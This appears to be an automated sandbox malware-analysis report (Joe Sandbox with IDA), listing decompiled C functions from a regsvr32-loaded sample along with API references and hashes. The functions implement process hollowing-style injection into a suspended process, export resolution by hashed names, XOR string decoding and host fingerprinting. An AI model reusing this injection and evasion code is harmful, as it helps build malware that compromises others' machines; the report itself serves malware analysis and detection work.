            • Instruction ID: a5bcc98587625b64f36ca13cdfe6939e6b256afb60845d6847b576f6e3fa6b34
            • Opcode Fuzzy Hash: 4a2139b8098c13373e5124f409f867e7c16d3852b704ebd5c3fc207008b6b30b
            • Instruction Fuzzy Hash: 57915279700705AFD708EBB4D848FEAB7F8BF4C300F084169E519DB285DB706A658BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E0316D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
            				long _v8;
            				long _v12;
            				void* _v16;
            				intOrPtr _v23;
            				void _v24;
            				long _v28;
            				struct _CONTEXT _v744;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t33;
            				void* _t57;
            				long _t59;
            				void* _t62;
            				void** _t65;
            				void* _t66;
            
            				_t65 = __edx;
            				_t57 = __ecx;
            				_t66 = 0;
            				if(E0316D309(__ecx, __edx, __edx, 0) != 0) {
            					_t33 = E0316D538( *((intOrPtr*)(__edx)), _a4); // executed
            					_t66 = _t33;
            					if(_t66 != 0) {
            						E03168F63( &_v744, 0, 0x2cc);
            						_v744.ContextFlags = 0x10002;
            						if(GetThreadContext(_t65[1],  &_v744) != 0) {
            							_t62 = _v744.Eax;
            							_v12 = _v12 & 0x00000000;
            							_v24 = 0xe9;
            							_t59 = 5;
            							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
            							_v8 = _t59;
            							_v16 = _t62;
            							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
            								L6:
            								_t66 = 0;
            							} else {
            								_v28 = _v28 & 0x00000000;
            								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
            									goto L6;
            								}
            							}
            						}
            					}
            				}
            				E0316D47C();
            				return _t66;
            			}


            APIs
              • Part of subcall function 0316D309: LoadLibraryW.KERNEL32 ref: 0316D403
              • Part of subcall function 0316D538: NtCreateSection.NTDLL(0316DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0316D5AA
              • Part of subcall function 0316D538: RegisterClassExA.USER32(?), ref: 0316D5FE
              • Part of subcall function 0316D538: CreateWindowExA.USER32 ref: 0316D629
              • Part of subcall function 0316D538: DestroyWindow.USER32(00000000), ref: 0316D634
              • Part of subcall function 0316D538: UnregisterClassA.USER32 ref: 0316D63F
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0316DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0316DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0316DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0316DAC7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: b48efcb7cb31fdadc3fcbed3863b49f3fffc844f85ec89ce0a14b9d06f6e1802
            • Instruction ID: 1f6860eba5a74a88766d61062083adaf1f1cfc70e6eb975a2b8d27ba07f345ff
            • Opcode Fuzzy Hash: b48efcb7cb31fdadc3fcbed3863b49f3fffc844f85ec89ce0a14b9d06f6e1802
            • Instruction Fuzzy Hash: 04314F76A0010AAFDB11DFA9DD44FEEFBBCEF08210F1441A6A505E7154D730EA55CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E0316EF38(void* __ecx, intOrPtr __edx) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v92;
            				intOrPtr _t41;
            				signed int _t47;
            				signed int _t49;
            				signed int _t51;
            				void* _t56;
            				struct HINSTANCE__* _t58;
            				_Unknown_base(*)()* _t59;
            				intOrPtr _t60;
            				void* _t62;
            				intOrPtr _t63;
            				void* _t69;
            				char _t70;
            				void* _t75;
            				CHAR* _t80;
            				void* _t82;
            
            				_t75 = __ecx;
            				_v12 = __edx;
            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
            				if(_t41 == 0) {
            					L4:
            					return 0;
            				}
            				_t62 = _t41 + __ecx;
            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
            				_t47 = 0;
            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_v8 = 0;
            				_v16 = _t63;
            				if(_t63 == 0) {
            					goto L4;
            				} else {
            					goto L2;
            				}
            				while(1) {
            					L2:
            					_t49 = E0316E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0316A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
            					_t51 = _v8;
            					if((_t49 ^ 0x218fe95b) == _v12) {
            						break;
            					}
            					_t73 = _v20;
            					_t47 = _t51 + 1;
            					_v8 = _t47;
            					if(_t47 < _v16) {
            						continue;
            					}
            					goto L4;
            				}
            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
            					return _t80;
            				} else {
            					_t56 = 0;
            					while(1) {
            						_t70 = _t80[_t56];
            						if(_t70 == 0x2e || _t70 == 0) {
            							break;
            						}
            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
            						_t56 = _t56 + 1;
            						if(_t56 < 0x40) {
            							continue;
            						}
            						break;
            					}
            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
            					if( *((char*)(_t56 + _t80)) != 0) {
            						_t80 =  &(( &(_t80[1]))[_t56]);
            					}
            					_t40 =  &_v92; // 0x6c6c642e
            					_t58 = LoadLibraryA(_t40); // executed
            					if(_t58 == 0) {
            						goto L4;
            					}
            					_t59 = GetProcAddress(_t58, _t80);
            					if(_t59 == 0) {
            						goto L4;
            					}
            					return _t59;
            				}
            			}

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0316F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0316F014
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 77b7fc34a80a278c65e0b7e8d3314ff8af54e8aea0af4a0f7712ff0ad7aede22
            • Instruction ID: 116a4a16b1c10b492c4c2097a1829ec2f4b1223ea29f30b37d32837c541e29ca
            • Opcode Fuzzy Hash: 77b7fc34a80a278c65e0b7e8d3314ff8af54e8aea0af4a0f7712ff0ad7aede22
            • Instruction Fuzzy Hash: 8A31E639A002159BCB14CFADD980BAEFBF9AF48244F2845A9D805DB341D730D9A1C7A0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 72%
            			E0316BAF6(void* __ecx, void* __edx) {
            				void* _v304;
            				char _v308;
            				intOrPtr _v312;
            				signed int _t16;
            				signed int _t17;
            				intOrPtr _t30;
            				void* _t33;
            				intOrPtr _t38;
            				void* _t43;
            				void* _t45;
            
            				_t33 = __edx;
            				_v304 = __ecx;
            				_t16 = CreateToolhelp32Snapshot(2, 0);
            				_t45 = _t16;
            				_t17 = _t16 | 0xffffffff;
            				if(_t45 != _t17) {
            					E03168F63( &_v304, 0, 0x128);
            					_v304 = 0x128;
            					if(Process32First(_t45,  &_v304) != 0) {
            						while(1) {
            							_t43 = _v312( &_v308, _t33);
            							if(_t43 == 0) {
            								break;
            							}
            							_t38 =  *0x317f8d0; // 0x4faf8c0
            							_push( &_v308);
            							_push(_t45);
            							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
            								continue;
            							}
            							break;
            						}
            						FindCloseChangeNotification(_t45);
            						_t17 = 0 | _t43 == 0x00000000;
            					} else {
            						_t30 =  *0x317f8d0; // 0x4faf8c0
            						 *((intOrPtr*)(_t30 + 0x30))(_t45);
            						_t17 = 0xfffffffe;
            					}
            				}
            				return _t17;
            			}


            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0316BB14
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • Process32First.KERNEL32(00000000,?), ref: 0316BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0316BB84
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: 766d7ac6122ee7a5c79bcca52786acddcf9c49b720a3619b0abc64274f9aec17
            • Instruction ID: d70c63fa7eb81c96d3a904d8390dc131e1b4a8521a0179312d503ca417ea23af
            • Opcode Fuzzy Hash: 766d7ac6122ee7a5c79bcca52786acddcf9c49b720a3619b0abc64274f9aec17
            • Instruction Fuzzy Hash: DA1181721042019BC310EFA9A849E6B77ECEF8C260F19066DF524C7188EB20D5558762
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 94%
            			E0316C778(WCHAR* __ecx, WCHAR* __edx) {
            				long _v8;
            				long _v12;
            				WCHAR* _v16;
            				short _v528;
            				short _v1040;
            				short _v1552;
            				intOrPtr _t23;
            				WCHAR* _t27;
            				signed int _t29;
            				void* _t33;
            				long _t38;
            				WCHAR* _t43;
            				WCHAR* _t56;
            
            				_t44 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t43 = __edx;
            				_t56 = __ecx;
            				E03168F63(__edx, 0, 0x100);
            				_v12 = 0x100;
            				_t23 =  *0x317f8d0; // 0x4faf8c0
            				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
            				lstrcpynW(__edx,  &_v528, 0x100);
            				_t27 = E03169F85(_t44, 0x978);
            				_v16 = _t27;
            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
            				asm("sbb eax, eax");
            				_v8 = _v8 &  ~_t29;
            				E03168D9A( &_v16);
            				_t33 = E0316A5E9(_t43);
            				E03169FE4( &(_t43[E0316A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
            				lstrcatW(_t43, _t56);
            				_t38 = E0316A5E9(_t43);
            				_v12 = _t38;
            				CharUpperBuffW(_t43, _t38);
            				return E0316E34A(_t43, E0316A5E9(_t43) + _t40, 0);
            			}


            APIs
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0316C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0316C7F1
              • Part of subcall function 03169FE4: _vsnwprintf.MSVCRT ref: 0316A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0316C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0316C83C
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 2068924c1c371672f9295d9173e22605a04b32c498f6b4b648591d857ad4dd80
            • Instruction ID: a1bea7299a98a2a31240a4d3a98f1692cd96ae677b6da92b7b523c20a3751f6d
            • Opcode Fuzzy Hash: 2068924c1c371672f9295d9173e22605a04b32c498f6b4b648591d857ad4dd80
            • Instruction Fuzzy Hash: A72130B6A10314BFDB14EBE4DC49FAE77BCEF8C210F1041A5F605E6185EB749A548B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 80%
            			E03168BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v28;
            				short _v44;
            				void* _t38;
            				intOrPtr _t47;
            				void* _t53;
            				intOrPtr _t54;
            				intOrPtr _t55;
            				intOrPtr _t56;
            				void* _t58;
            				intOrPtr _t59;
            				void* _t62;
            				void* _t64;
            				signed int _t71;
            				signed int _t74;
            				void* _t76;
            				void* _t77;
            
            				_t71 = _a12;
            				_t53 = __edx;
            				_v8 = __ecx;
            				_t74 = _t71;
            				if(_t71 >= __edx) {
            					L4:
            					_t54 = 0x317f94e;
            					L5:
            					_t58 = 0;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsw");
            					asm("movsb");
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					asm("stosw");
            					asm("stosb");
            					_t38 = 0;
            					if(_v28 == 0) {
            						L8:
            						_t64 = _t38;
            						if(_t64 == 0) {
            							L10:
            							lstrlenW( &_v44);
            							return _t54;
            						} else {
            							goto L9;
            						}
            						do {
            							L9:
            							_t19 = _t58 + 0x30; // 0x30
            							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
            							_t58 = _t58 + 1;
            						} while (_t58 < _t64);
            						goto L10;
            					} else {
            						goto L6;
            					}
            					do {
            						L6:
            						_t38 = _t38 + 1;
            					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
            					_t64 = 0xe;
            					if(_t38 > _t64) {
            						goto L9;
            					}
            					goto L8;
            				}
            				_t59 = _a4;
            				_a12 = 0x5a;
            				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
            					_t74 = _t74 + 1;
            					if(_t74 < _t53) {
            						continue;
            					}
            					goto L4;
            				}
            				_t76 = _t74 - _t71;
            				if(_t76 == 0) {
            					goto L4;
            				}
            				_t47 = E03168DC9(_t76 + 1); // executed
            				_t55 = _t47;
            				_v12 = _t55;
            				if(_t55 != 0) {
            					_t56 = _a4;
            					_t62 = _t55 - _t71;
            					do {
            						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
            						_t71 = _t71 + 1;
            						_t76 = _t76 - 1;
            					} while (_t76 != 0);
            					_t54 = _v12;
            					goto L5;
            				}
            				return 0x317f94e;
            			}

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,0317CA88), ref: 03168C50
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: b97396ced3ae9316096a1218242f6a633122d2338aab083e97d0c3cac7b55aad
            • Instruction ID: 0f4113aba63d950dde0e66a9e16982072beb1d969048dc2180a00937f7e179ff
            • Opcode Fuzzy Hash: b97396ced3ae9316096a1218242f6a633122d2338aab083e97d0c3cac7b55aad
            • Instruction Fuzzy Hash: 58213531B016896FCB04CFECC8804EEBFB6BF8E210B2C4478E941AB201D731D9968790
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 86%
            			E0316C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
            				long _v8;
            				void* _v12;
            				void* _t12;
            				void* _t20;
            				void* _t22;
            				union _TOKEN_INFORMATION_CLASS _t28;
            				void* _t31;
            
            				_push(_t22);
            				_push(_t22);
            				_t31 = 0;
            				_t28 = __edx;
            				_t20 = _t22;
            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
            					L6:
            					_t12 = _t31;
            				} else {
            					_t31 = E03168DC9(_v8);
            					_v12 = _t31;
            					if(_t31 != 0) {
            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
            							goto L6;
            						} else {
            							E03168DDF( &_v12, _t16);
            							goto L3;
            						}
            					} else {
            						L3:
            						_t12 = 0;
            					}
            				}
            				return _t12;
            			}

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03160000,00000000,00000000,?,0316CA07,00000000,00000000,?,0316CA30), ref: 0316C9A1
            • GetLastError.KERNEL32(?,0316CA07,00000000,00000000,?,0316CA30,00001644,?,0316E053), ref: 0316C9A8
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0316CA07,00000000,00000000,?,0316CA30,00001644,?,0316E053), ref: 0316C9D7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: da49c706294079bea6c60e416f3ea7a1a20b874fc9323c48673f32ab09a17538
            • Instruction ID: f455c234c1ba450341d9615e037005ac6cb6effc6528fe49d3242369938ff457
            • Opcode Fuzzy Hash: da49c706294079bea6c60e416f3ea7a1a20b874fc9323c48673f32ab09a17538
            • Instruction Fuzzy Hash: 18018B76600214BF8B24ABE6EC49D9B7EACEE4D7A07150465F445D6101E730DDA08BF0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E0316BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
            				struct _STARTUPINFOW _v72;
            				signed int _t11;
            
            				E03168F63(__edx, 0, 0x10);
            				E03168F63( &_v72, 0, 0x44);
            				_v72.cb = 0x44;
            				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
            				asm("sbb eax, eax");
            				return  ~( ~_t11) - 1;
            			}

            APIs
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0316BE52
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: cbbb4fdfff018baa71e1113f83f3bc875c9ab5820eadd66d42a80c7e35c4d3d2
            • Instruction ID: 446dc1f54c52e8fd6c46de13dac812d253ba7373854626675f344916074bbe62
            • Opcode Fuzzy Hash: cbbb4fdfff018baa71e1113f83f3bc875c9ab5820eadd66d42a80c7e35c4d3d2
            • Instruction Fuzzy Hash: 53F065F16402187FF720E6A5CC0AFBF36ACDB85714F500165BB05EB1C0E6A0AD4582B5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 96%
            			E0316D889(intOrPtr __edx) {
            				intOrPtr _v8;
            				signed int _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				char _v24;
            				intOrPtr _v36;
            				char _v40;
            				char _v80;
            				char _t37;
            				intOrPtr _t38;
            				signed int _t45;
            				void* _t49;
            				intOrPtr _t50;
            				intOrPtr _t52;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t59;
            				void* _t62;
            				intOrPtr _t63;
            				signed int _t67;
            				intOrPtr _t69;
            				void* _t70;
            				intOrPtr _t86;
            				char _t87;
            				void* _t88;
            
            				_v16 = _v16 & 0x00000000;
            				_v20 = __edx;
            				_t86 = 0;
            				_t37 = E0316D7CD( &_v16, __edx);
            				_t87 = _t37;
            				_v24 = _t87;
            				_t89 = _t87;
            				if(_t87 == 0) {
            					return _t37;
            				}
            				_t38 =  *0x317f8d4; // 0x4fafc00
            				_t7 = _t38 + 0xac; // 0xa4858137
            				E0316B6E3( &_v80,  *_t7 + 7, _t89);
            				_v12 = _v12 & 0;
            				_t67 = _v16;
            				if(_t67 == 0) {
            					L21:
            					E03168DDF( &_v24, 0);
            					return _t86;
            				}
            				while(_t86 == 0) {
            					_t69 = 0;
            					_v8 = 0;
            					while(_t86 == 0) {
            						E03168F63( &_v40, _t86, 0x10);
            						_t88 = _t88 + 0xc;
            						_t49 = E0316BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
            						_t94 = _t49;
            						if(_t49 >= 0) {
            							_t56 = E0316D9DE(E03166297,  &_v40, _t94, _v20); // executed
            							if(_t56 != 0) {
            								_t59 =  *0x317f8d0; // 0x4faf8c0
            								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
            								if(_t70 != 0) {
            									GetLastError();
            									_t62 = E0316DADC( &_v40);
            									_t63 =  *0x317f8d0; // 0x4faf8c0
            									if(_t62 != 0) {
            										_push(0xea60);
            										_push(_t70);
            										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
            											_t86 = _t86 + 1;
            										}
            										_t63 =  *0x317f8d0; // 0x4faf8c0
            									}
            									FindCloseChangeNotification(_t70);
            								}
            								_t69 = _v8;
            							}
            						}
            						if(_v40 != 0) {
            							if(_t86 == 0) {
            								_t54 =  *0x317f8d0; // 0x4faf8c0
            								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
            							}
            							_t50 =  *0x317f8d0; // 0x4faf8c0
            							 *((intOrPtr*)(_t50 + 0x30))(_v36);
            							_t52 =  *0x317f8d0; // 0x4faf8c0
            							 *((intOrPtr*)(_t52 + 0x30))(_v40);
            						}
            						_t69 = _t69 + 1;
            						_v8 = _t69;
            						if(_t69 < 2) {
            							continue;
            						} else {
            							break;
            						}
            					}
            					_t67 = _v16;
            					_t45 = _v12 + 1;
            					_v12 = _t45;
            					if(_t45 < _t67) {
            						continue;
            					} else {
            						break;
            					}
            					do {
            						goto L20;
            					} while (_t67 != 0);
            					goto L21;
            				}
            				L20:
            				E03168DDF(_t87, 0xfffffffe);
            				_t87 = _t87 + 4;
            				_t67 = _t67 - 1;
            			}

            APIs
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
              • Part of subcall function 0316BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0316BE52
              • Part of subcall function 0316D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0316DA40
              • Part of subcall function 0316D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0316DA89
              • Part of subcall function 0316D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0316DAA6
              • Part of subcall function 0316D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0316DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0316D939
              • Part of subcall function 0316DADC: ResumeThread.KERNELBASE(?,0316D947,?,?,00000001), ref: 0316DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0316D964
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: 950007f8124c31921475d29ce9db5b3e9dbb7e7933f6316e291094ccf5cdf5cd
            • Instruction ID: 5aa31dfa89c6a0a4dcea3f0677a64a93af97780a1e80b89e6bc42df895bac974
            • Opcode Fuzzy Hash: 950007f8124c31921475d29ce9db5b3e9dbb7e7933f6316e291094ccf5cdf5cd
            • Instruction Fuzzy Hash: A841A276A00209AFCB14EFE9D984EAEB7F9FF4C310F1840A5E905E7254D7309A61CB20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
            				long _v8;
            				intOrPtr _t15;
            				WCHAR* _t23;
            				long _t24;
            				void* _t28;
            				void* _t31;
            				intOrPtr _t36;
            				void* _t41;
            				void* _t48;
            				intOrPtr* _t49;
            
            				_push(__ecx);
            				if(_a8 != 1) {
            					__eflags = _a8;
            					if(_a8 != 0) {
            						L7:
            						__eflags = 1;
            						return 1;
            					}
            					_t15 =  *0x317f8d0; // 0x4faf8c0
            					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
            					L3:
            					return 0;
            				}
            				E03168DB4();
            				E03169787();
            				 *0x317f8e8 = _a4;
            				E03173D36(_a4);
            				 *_t49 = 0xf2e;
            				 *0x317f8d0 = E0316F0D9(0x317ca88, 0x138);
            				 *_t49 = 0xe8d;
            				_t23 = E03169F85(0x317ca88);
            				_pop(_t41);
            				_a8 = _t23;
            				_t24 = GetFileAttributesW(_t23); // executed
            				_push( &_a8);
            				if(_t24 == 0xffffffff) {
            					E03168D9A();
            					 *_t49 = 0x1f4;
            					_t28 = E0316FCDA(E0316109A(_t41));
            					_a8 = _t28;
            					__eflags = _t28;
            					if(_t28 != 0) {
            						_t48 = 0x54;
            						 *0x317f8e0 = E0316F0D9(0x317cbf0, _t48);
            						E0316647A(_t48, __eflags);
            						E03168DDF( &_a8, 0xfffffffe);
            						_t36 =  *0x317f8d0; // 0x4faf8c0
            						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
            					}
            					_v8 = 0;
            					_t31 = CreateThread(0, 0, E031663A2, 0, 0,  &_v8);
            					 *0x317f8f4 = _t31;
            					__eflags = _t31;
            					if(_t31 == 0) {
            						goto L3;
            					} else {
            						goto L7;
            					}
            				}
            				E03168D9A();
            				goto L3;
            			}

            APIs
              • Part of subcall function 03168DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,03166616), ref: 03168DBD
              • Part of subcall function 0316F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0317CA88,?,0316663F,?), ref: 0316F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 03166655
            • CreateThread.KERNELBASE(00000000,00000000,031663A2,00000000,00000000,?), ref: 031666DC
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: 37de922ba36eaa62f74f91dcded22c407d0ac98da414a3c492624d8f1663df3e
            • Instruction ID: df4bc0fd26cbb9e2094e97a73ccec9ed3679a7acfe533fd3923ec7de62537b6e
            • Opcode Fuzzy Hash: 37de922ba36eaa62f74f91dcded22c407d0ac98da414a3c492624d8f1663df3e
            • Instruction Fuzzy Hash: 6E2119B6504305AFDB08FFF5E904A6E37F9AB4C310F198529A52ADE1C4EB74C5A18B21
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 47%
            			E0316F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
            				char _v8;
            				char _t5;
            				struct HINSTANCE__* _t7;
            				void* _t10;
            				void* _t12;
            				void* _t22;
            				void* _t25;
            
            				_push(__ecx);
            				_t12 = __ecx;
            				_t22 = __edx;
            				_t5 = E03169F6B(_a4);
            				_t25 = 0;
            				_v8 = _t5;
            				_push(_t5);
            				if(_a4 != 0xf2e) {
            					_t7 = LoadLibraryA(); // executed
            				} else {
            					_t7 = GetModuleHandleA();
            				}
            				if(_t7 != 0) {
            					_t10 = E0316F08E(_t12, _t22, _t7); // executed
            					_t25 = _t10;
            				}
            				E03168D87( &_v8);
            				return _t25;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,0317CA88,?,0316663F,?), ref: 0316F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,0317CA88,?,0316663F,?), ref: 0316F108
            Memory Dump Source
